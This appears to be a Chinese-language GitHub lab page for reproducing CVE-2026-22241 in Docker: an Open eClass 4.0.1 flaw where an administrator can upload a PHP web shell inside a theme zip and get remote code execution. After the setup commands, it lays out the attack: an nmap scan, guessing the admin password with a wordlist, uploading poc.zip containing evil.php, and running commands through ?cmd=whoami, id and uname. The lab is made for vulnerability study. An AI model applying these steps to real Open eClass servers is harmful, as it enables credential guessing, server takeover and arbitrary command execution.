CVEs-Labs/CVE-2026-22241
GitHub: CVEs-Labs/CVE-2026-22241
针对 Open eClass 平台文件上传漏洞 CVE-2026-22241 的 Docker 实验环境,复现从恶意文件上传到远程代码执行的完整攻击过程。
Stars: 0 | Forks: 0
# CVE-2026-22241
CVE-2026-22241 漏洞环境
# 漏洞描述:
- 漏洞类型:危险类型文件的不受限制上传。
- 影响:远程代码执行 (RCE)。
- 描述:该漏洞允许具有管理权限的攻击者上传恶意 PHP 文件 (Web Shell),从而导致 Web 服务器的完整性和安全性完全受损。
- 目标系统:OpenClass 教育基础设施。
# 1. 搭建环境
git clone https://github.com/CVEs-Labs/CVE-2026-22241.git
打开 https://www.openeclass.org/en/previous-versions/ 并下载 openeclass-4.0.1.zip
sudo apt update && sudo apt install docker.io docker-compose -y
sudo systemctl start docker
mkdir eclass-lab
mv /home/Red101/Downloads/openeclass-4.0.1.zip eclass-lab
cd eclass-lab
zip poc.zip evil.php
mkdir html
unzip openeclass-4.0.1.zip -d ./html
cd ~/eclass-lab/html
mv openeclass-4.0.1/* .
mv openeclass-4.0.1/.* . 2>/dev/null
rmdir openeclass-4.0.1
cd ..
sudo chown -R 33:33 html/
sudo chmod -R 777 html/
sudo chown -R $USER:$USER html/
sudo docker-compose up -d
sudo docker exec -it eclass-web bash -c "apt-get update && apt-get install -y libpng-dev libzip-dev libicu-dev libxml2-dev libldap2-dev && docker-php-ext-configure ldap --with-libdir=lib/x86_64-linux-gnu/ && docker-php-ext-install zip gd pdo pdo_mysql intl soap ldap && apache2ctl restart"
sudo docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' eclass-web
http://ip-docker
在 eclass 页面中:
主机 (Host): db
数据库: eclass
用户: root
密码 (Password): rootpassword
# 2. 利用漏洞:
nmap -sV ip-docker
用于 ZAP 密钥列表:
https://gitlab.com/kalilinux/packages/seclists/-/blob/kali/master/Passwords/Common-Credentials/Pwdb_top-1000.txt
在 eclass 页面中:
前往 管理员工具 -> 主题设置 -> 然后上传 poc.zip
在新页面中:
http://172.19.0.3/courses/theme_data/evil.php?cmd=whoami
http://172.19.0.3/courses/theme_data/evil.php?cmd=uname%20-a
http://172.19.0.3/courses/theme_data/evil.php?cmd=id
标签:CISA项目, CVE-2026-22241, Docker, ffuf, OpenClass, Open eClass, OpenVAS, PE 加载器, PHP, RCE, Web Shell, 任意文件上传, 协议分析, 安全防御评估, 文件上传漏洞, 权限提升, 漏洞复现, 版权保护, 编程工具, 网络安全, 请求拦截, 远程代码执行, 隐私保护, 靶场环境, 高危漏洞